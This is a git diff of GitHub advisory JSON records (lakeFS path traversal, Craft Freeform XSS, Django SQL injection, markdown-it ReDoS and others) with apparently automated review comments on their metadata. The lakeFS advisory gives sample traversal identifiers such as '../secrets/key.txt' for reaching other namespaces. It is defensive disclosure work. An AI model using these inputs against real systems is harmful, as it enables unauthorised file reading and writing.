diff --git a/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json b/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
index 7fb728d6c73bb..c544e6b1f1382 100644
--- a/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
+++ b/advisories/github-reviewed/2025/03/GHSA-3jxr-23ph-c89g/GHSA-3jxr-23ph-c89g.json
@@ -1,13 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3jxr-23ph-c89g",
- "modified": "2025-06-03T17:32:56Z",
+ "modified": "2026-02-13T20:52:09Z",
"published": "2025-03-04T18:33:43Z",
- "aliases": [
- "CVE-2025-23368"
- ],
- "summary": "Wildfly Elytron integration susceptible to brute force attacks via CLI",
- "details": "A flaw was found in Wildfly Elytron integration. The component does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks via CLI.",
+ "withdrawn": "2026-02-13T20:52:09Z",
+ "aliases": [],
+ "summary": "Duplicate Advisory: Wildfly Elytron integration susceptible to brute force attacks via CLI",
+ "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qhp6-6p8p-2rqh. This link is maintained to preserve external references.\n\n### Original Description\nA flaw was found in Wildfly Elytron integration. The component does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks via CLI.",
"severity": [
{
"type": "CVSS_V3",
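Review bot: Emptying `aliases` on withdrawal removes the only machine-readable link from CVE-2025-23368 to this record, so a scanner that resolves by CVE will no longer land here and will only find the canonical advisory if it already knows to look for GHSA-qhp6-6p8p-2rqh, which is stated in prose only. OSV 1.4.0 has a `related` field for exactly this case; consider `"related": ["GHSA-qhp6-6p8p-2rqh", "CVE-2025-23368"]` next to the new `withdrawn` key so the duplicate relationship survives without re-claiming the CVE as an alias. The `severity` block (and presumably the `affected` ranges) stay in the file, so downstream tooling must treat `withdrawn` as authoritative over them; the reference list is outside this hunk, so I cannot tell whether the canonical advisory is also listed there as an `ADVISORY` reference.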
diff --git a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
index fa33bbc866cc0..f090ff0e06d20 100644
--- a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
+++ b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jp3q-wwp3-pwv9",
- "modified": "2026-02-10T13:47:10Z",
+ "modified": "2026-02-13T14:57:31Z",
"published": "2026-01-22T21:41:14Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26188"
+ ],
"summary": "Freeform Craft Plugin CP UI (builder/integrations) has Stored Cross-Site Scripting (XSS) issue",
"details": "**Summary**\nAn authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with `dangerouslySetInnerHTML` without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens.\n\n**Affected Product**\n- Ecosystem: Packagist (Craft CMS plugin)\n- Package: solspace/craft-freeform\n- Version: <= 5.14.6 (latest observed). Likely all 5.x until patched.\n\n**Details**\n- Root cause: Multiple user-controlled strings (field labels, section labels, integration icons, short names, WYSIWYG previews) are injected into React components using `dangerouslySetInnerHTML` without sanitization.\n- Evidence: `dangerouslySetInnerHTML` on user-controlled properties in bundled CP JS at [packages/plugin/src/Resources/js/client/client.js](packages/plugin/src/Resources/js/client/client.js#L1).\n\n**PoCs**\n- Label-based XSS:\n 1. In Craft CP, create/edit a Freeform field and set its label to `
`.\n 2. Open the form builder view containing the field.\n 3. Alert executes (stored XSS).\n- Integration icon SVG:\n 1. Set an integration \"icon SVG\" to ``.\n 2. Open the integrations CP view.\n 3. Script executes.\n\n**Impact**\nArbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.\n\n**Remediation**\n- Sanitize/HTML-encode all user-controlled strings before passing to `dangerouslySetInnerHTML`, or avoid it for labels/titles/icons.\n- Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.\n- Add regression tests with `
` payloads to ensure no execution in builder/integration views.\n\n**Workarounds**\n- Restrict form-edit permissions to trusted admins only until patched.\n- Consider CSP that disallows inline scripts (defense-in-depth only).\n\n**Credits**\n- Discovered by https://www.linkedin.com/in/praveenkavinda/ | Prav33N-Sec.",
"severity": [
@@ -41,9 +43,21 @@
"type": "WEB",
"url": "https://github.com/solspace/craft-freeform/security/advisories/GHSA-jp3q-wwp3-pwv9"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/commit/b9adad6cdf1eba5400aae8b1ae39bd7d4d33af5e"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/solspace/craft-freeform"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/releases/tag/v5.14.7"
}
],
"database_specific": {
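Review bot: The new `v5.14.7` release and `b9adad6…` commit references imply a fix version, but the `details` text above still says "<= 5.14.6 (latest observed). Likely all 5.x until patched" and never states what version resolves it, so a reader of the description alone cannot tell whether to upgrade. A one-line "Patched in 5.14.7" in the details, and an `affected[].ranges` `fixed` event of `"5.14.7"` (the ranges are outside this hunk, so I cannot confirm they were updated), would make the record self-consistent. Separately, the PoC steps render with empty payload slots where the `<script>`-style payloads should be — if the stored text has them sanitized away, a fenced or entity-escaped form would preserve them for reviewers.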
@@ -53,6 +67,6 @@
"severity": "LOW",
"github_reviewed": true,
"github_reviewed_at": "2026-01-22T21:41:14Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T23:16:09Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json b/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
index 9b5fa17ff0a3b..a6f24f73aa131 100644
--- a/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
+++ b/advisories/github-reviewed/2026/01/GHSA-wv3h-x6c4-r867/GHSA-wv3h-x6c4-r867.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-wv3h-x6c4-r867",
- "modified": "2026-02-10T13:47:26Z",
+ "modified": "2026-02-13T20:24:37Z",
"published": "2026-01-21T09:31:30Z",
"aliases": [
"CVE-2025-14559"
@@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "26.5.0"
},
{
"fixed": "26.5.2"
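Review bot: Changing `introduced` from `"0"` to `"26.5.0"` declares every version below 26.5.0 of this package unaffected, and that is only correct if the separate `org.keycloak:keycloak-services` entry added later in this change (fixed `26.4.9`) is the same artifact — the package name for this range sits above the hunk, so I cannot confirm it. If it is a different artifact (e.g. a quarkus/server distribution coordinate), its 26.4.x and earlier versions silently drop out of the advisory. The split would be self-evident if both branches were events of one range, `{"introduced":"0"},{"fixed":"26.4.9"},{"introduced":"26.5.0"},{"fixed":"26.5.2"}`, and the new entry should also carry `database_specific.last_known_affected_version_range` like the other entries in this batch.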
@@ -33,6 +33,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.keycloak:keycloak-services"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "26.4.9"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -44,6 +63,10 @@
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/issues/45651"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/keycloak/keycloak/commit/2d0aa31c4830ebaad094c3762e78b884c141e659"
+ },
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/d67349f3aa9fed5c61750619d0f9de6356aeaeff"
diff --git a/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
new file mode 100644
index 0000000000000..e6959febeead2
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-27jp-wm6q-gp25/GHSA-27jp-wm6q-gp25.json
@@ -0,0 +1,66 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-27jp-wm6q-gp25",
+ "modified": "2026-02-13T16:16:11Z",
+ "published": "2026-02-13T16:16:11Z",
+ "aliases": [],
+ "summary": "sqlparse: formatting list of tuples leads to denial of service",
+ "details": "### Summary\nThe below gist hangs while attempting to format a long list of tuples.\n\nThis was found while [drafting a regression test for Dja\nngo 5.2's composite primary key feature](https://code.djangoproject.com/ticket/36416#comment:3), which allows querying composite fields with tuples.\n\n###",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "sqlparse"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.5.4"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.5.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-27jp-wm6q-gp25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/commit/40ed3aa958657fa4a82055927fa9de70ab903360"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/andialbrecht/sqlparse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/andialbrecht/sqlparse/releases/tag/0.5.4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-770"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:11Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
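Review bot: The CVSS v4 vector records `VI:L` with `VA:N`, yet the summary, the details ("hangs while attempting to format") and CWE-770 all describe a denial of service — availability is the impacted dimension, so the vector should read `VI:N` with `VA:L` (or `VA:H`) and the `severity` bucket re-derived from it. The `details` field is also incomplete: "The below gist hangs" is followed by no gist link, the word "Django" is broken across a line (`Dja\nngo`), and the text ends on a dangling `###` heading, so the reproduction cannot be followed from this record; restore the gist URL and the remainder of the upstream write-up. Adding `last_known_affected_version_range` is present here, which is good — keep that pattern for the other new entries.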
diff --git a/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
new file mode 100644
index 0000000000000..2dd1016e60662
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2xf7-hmf6-p64j",
+ "modified": "2026-02-13T20:55:54Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-20796"
+ ],
+ "summary": "Mattermost doesn't properly validate channel membership at the time of data retrieval",
+ "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ },
+ {
+ "fixed": "10.11.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 10.11.9"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-367"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:55:54Z",
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
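Review bot: The `details` string contains a doubled period, "`/common_teams` API endpoint.." — change it to "endpoint. Mattermost Advisory ID: MMSA-2025-00549". The references give only the generic `mattermost.com/security-updates` page; if a fix commit or the MMSA-2025-00549 entry has its own URL, adding it as a `WEB` reference lets a reader verify the 10.11.10 fix rather than trust the range.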
diff --git a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
index a06c125cd8919..c2459ea5cf20f 100644
--- a/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
+++ b/advisories/github-reviewed/2026/02/GHSA-33mh-2634-fwr2/GHSA-33mh-2634-fwr2.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-33mh-2634-fwr2",
- "modified": "2026-02-12T14:22:46Z",
+ "modified": "2026-02-13T17:16:36Z",
"published": "2026-02-09T20:37:05Z",
"aliases": [
"CVE-2026-25765"
diff --git a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
index 65e255a2c2b57..3979b68093b3c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
+++ b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-37gf-gmxv-74wv",
- "modified": "2026-02-10T18:35:15Z",
+ "modified": "2026-02-13T21:49:42Z",
"published": "2026-02-09T21:31:03Z",
"aliases": [
"CVE-2026-1486"
@@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "26.5.0"
},
{
"fixed": "26.5.3"
@@ -33,6 +33,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.keycloak:keycloak-services"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "26.4.9"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -52,6 +71,10 @@
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/commit/176dc8902ce552056d3648c4601d519afc6fb043"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/keycloak/keycloak/commit/8316e8538f0037d9f998181e73122cff93a94035"
+ },
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:2365"
diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
similarity index 67%
rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
index 89a716520ae70..8d068ccd0ebf8 100644
--- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-38c4-r59v-3vqw",
- "modified": "2026-02-12T06:30:13Z",
+ "modified": "2026-02-13T20:04:39Z",
"published": "2026-02-12T06:30:13Z",
"aliases": [
"CVE-2026-2327"
],
+ "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)",
"details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.",
"severity": [
{
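Review bot: The new `summary` has a grammatical error, "markdown-it is has a Regular Expression Denial of Service (ReDoS)"; since the details name the exact location, a precise form is `"markdown-it has a Regular Expression Denial of Service (ReDoS) in the linkify rule"`. Summaries are what most consumers display in lists, so this is the line worth getting right.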
@@ -14,10 +15,30 @@
},
{
"type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "markdown-it"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "13.0.0"
+ },
+ {
+ "fixed": "14.1.1"
+ }
+ ]
+ }
+ ]
}
],
- "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +52,13 @@
"type": "WEB",
"url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
},
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/markdown-it/markdown-it"
+ },
{
"type": "WEB",
- "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33"
+ "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33"
},
{
"type": "WEB",
@@ -45,8 +70,8 @@
"CWE-1333"
],
"severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:04:39Z",
"nvd_published_at": "2026-02-12T06:16:02Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
index a760766599ba5..4ca15dfff45b2 100644
--- a/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
+++ b/advisories/github-reviewed/2026/02/GHSA-6426-9fv3-65x8/GHSA-6426-9fv3-65x8.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6426-9fv3-65x8",
- "modified": "2026-02-03T19:35:57Z",
+ "modified": "2026-02-13T19:55:25Z",
"published": "2026-02-03T15:30:24Z",
"aliases": [
"CVE-2026-1312"
@@ -10,8 +10,8 @@
"details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\n`.QuerySet.order_by()` is subject to SQL injection in column aliases containing periods when the same alias is, using a suitably crafted dictionary, with dictionary expansion, used in `FilteredRelation`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Solomon Kebede for reporting this issue.",
"severity": [
{
- "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
}
],
"affected": [
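Review bot: Replacing the v4 vector (`VC:H/VI:H/VA:H`) with v3.1 `PR:L/C:L/I:L/A:N` and dropping `severity` from HIGH to MODERATE records no rationale for a CWE-89 finding. The reduced impact presumably reflects that the alias must reach `FilteredRelation` through a developer-built dictionary ("using a suitably crafted dictionary, with dictionary expansion" in the details), but nothing in the file says so, and a reader comparing the two revisions sees only a silent downgrade of a SQL injection. GHSA-38c4-r59v-3vqw in this same change keeps both a v3 and a v4 entry in `severity`; doing the same here, or adding a reference that documents the re-assessment, would preserve the history.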
@@ -107,7 +107,7 @@
"cwe_ids": [
"CWE-89"
],
- "severity": "HIGH",
+ "severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-03T19:35:56Z",
"nvd_published_at": "2026-02-03T15:16:13Z"
diff --git a/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
new file mode 100644
index 0000000000000..d32cbf85ee211
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-699m-4v95-rmpm/GHSA-699m-4v95-rmpm.json
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-699m-4v95-rmpm",
+ "modified": "2026-02-13T22:11:49Z",
+ "published": "2026-02-13T16:16:04Z",
+ "aliases": [
+ "CVE-2026-26187"
+ ],
+ "summary": "lakeFS vulnerable to path traversal in local block adapter allow cross-namespace and sibling directory access",
+ "details": "## Summary\n\nTwo path traversal vulnerabilities in the local block adapter allow authenticated users to read and write files outside their designated storage boundaries.\n\n## Details\n\nThe local block adapter in `pkg/block/local/adapter.go` had two path traversal vulnerabilities:\n\n### 1. Prefix Bypass Vulnerability\n\nThe `verifyRelPath` function used `strings.HasPrefix()` to verify that requested paths fall within the configured storage directory. This check was insufficient because it validated only the path prefix without requiring a path separator, allowing access to sibling directories with similar names.\n\n**Example:** If the adapter is configured with base path `/data/lakefs`:\n\n| Path | Expected | Actual |\n|------|----------|--------|\n| `/data/lakefs/valid/file.txt` | Allowed | Allowed |\n| `/data/lakefs_evil/secret.txt` | Blocked | **Vulnerable** |\n| `/data/lakefs_backup/data.db` | Blocked | **Vulnerable** |\n\n### 2. Namespace Escape via Identifier\n\nThe adapter verified that resolved paths stayed within the adapter's base path, but did not verify that object identifiers stayed within their designated storage namespace. 
This allowed attackers to use path traversal sequences in the object identifier to access files in other namespaces.\n\n**Example:** With base path `/data/lakefs` and namespace `local://repo1/userdata`:\n\n| Identifier | Resolved Path | Expected | Actual |\n|------------|---------------|----------|--------|\n| `file.txt` | `/data/lakefs/repo1/userdata/file.txt` | Allowed | Allowed |\n| `../secrets/key.txt` | `/data/lakefs/repo1/secrets/key.txt` | Blocked | **Vulnerable** |\n| `../../other-repo/data.txt` | `/data/lakefs/other-repo/data.txt` | Blocked | **Vulnerable** |\n\nThis vulnerability allows users with access to one namespace to read and write files in other namespaces within the same lakeFS deployment.\n\n## Impact\n\nAuthenticated lakeFS users can:\n\n- **Read and write files in sibling directories** that share the same path prefix as the storage directory (vulnerability 1)\n- **Access files across namespaces** by using path traversal in object identifiers (vulnerability 2)\n\nThis could allow attackers to:\n\n- Read sensitive data from other repositories/namespaces\n- Write malicious files to other namespaces\n- Read/write files in adjacent directories outside lakeFS storage\n- Potentially escalate privileges if writable directories are used by other services\n\nThis vulnerability **only affects** deployments using the local block adapter. Deployments using S3, GCS, Azure, or other object storage backends are **not affected**.\n\n## Patches\n\nFixed in version v1.77.0.\n\nThe fixes:\n1. Append a path separator to prefix checks, ensuring paths must be within the storage directory\n2. 
Add two-level path validation: verify both that namespace paths stay within the adapter's base path AND that resolved paths stay within their designated namespace\n\n## Workarounds\n\n- Configure the storage path with a unique name unlikely to be a prefix of other directories\n- Restrict filesystem permissions for the lakeFS process\n- Ensure no sensitive data exists in sibling directories\n\n## Credit\n\nDiscovered via CodeQL static analysis.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/treeverse/lakefs"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.77.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.76.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/security/advisories/GHSA-699m-4v95-rmpm"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26187"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/commit/cbc106275357302a834280f133265dc39f1384ce"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/treeverse/lakeFS"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/treeverse/lakeFS/releases/tag/v1.77.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T16:16:04Z",
+ "nvd_published_at": "2026-02-13T19:17:29Z"
+ }
+}
\ No newline at end of file
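Review bot: The Workarounds section only mitigates vulnerability 1 (the sibling-directory prefix bypass); none of the three items blocks `../` segments in object identifiers (vulnerability 2), and the advisory does not say so, which invites operators to rename the storage path and consider themselves covered. Add an explicit line such as "There is no workaround for the namespace escape; upgrade to v1.77.0." Separately, "append a path separator to prefix checks" is only sound if the candidate path is lexically cleaned and made absolute before the comparison (otherwise `/data/lakefs/../other` still carries the prefix); the "two-level path validation" in the fix description presumably covers this, but it is worth confirming against commit `cbc1062…` rather than inferring.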
diff --git a/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json b/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json
new file mode 100644
index 0000000000000..2497c081ff318
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-7587-4wv6-m68m/GHSA-7587-4wv6-m68m.json
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7587-4wv6-m68m",
+ "modified": "2026-02-13T20:54:19Z",
+ "published": "2026-02-13T20:54:19Z",
+ "aliases": [],
+ "summary": "rPGP vulnerable to parser crash on crafted RSA secret key packets through CVE-2026-21895",
+ "details": "### Summary\nIt was possible to trigger an unhandled edge case in the Rust Crypto rsa crate through rPGP packet parsing functionality, and crash the process that runs rPGP. This problem has been patched in a new rsa version. The new release of rPGP ensures a patched version of the rsa crate is in use, which prevents this issue.\n\n### Details\nWhile parsing a special RSA secret key packet, rPGP calls the rsa crate with the provided key. On vulnerable versions, this results in a Rust \"panic\" during key construction. Note that an attacker can trigger this situation even in places where applications don't expect to handle foreign key material, for example while attempting to receive a message.\n\nFor more information on the rsa crate vulnerability, see https://github.com/RustCrypto/RSA/security/advisories/GHSA-9c48-w39g-hm26 and https://github.com/RustCrypto/RSA/pull/624.\nIn rPGP, this has been fixed via https://github.com/rpgp/rpgp/pull/698.\n\n### Impact\nThis issue impacts availability (i.e. applications can crash).\n\nAffected rPGP versions: rPGP 0.16.0-alpha.0 to 0.18.0\nVulnerable rsa versions: all before version 0.9.10\n\n### Workaround\nThe issue depends on the combination of affected rPGP and rsa versions. Users of affected rPGP versions can pin the patched rsa 0.9.10 via a cargo lockfile to mitigate the issue.\n\n### Attribution\nDiscovered by Christian Reitter from Radically Open Security during a security review for Proton AG.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-7587-4wv6-m68m"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/pull/698"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/commit/38efa49ce18b3821649de9cd8dea88a959b833a5"
+ },
+ {
+ "type": "PACKAGE",
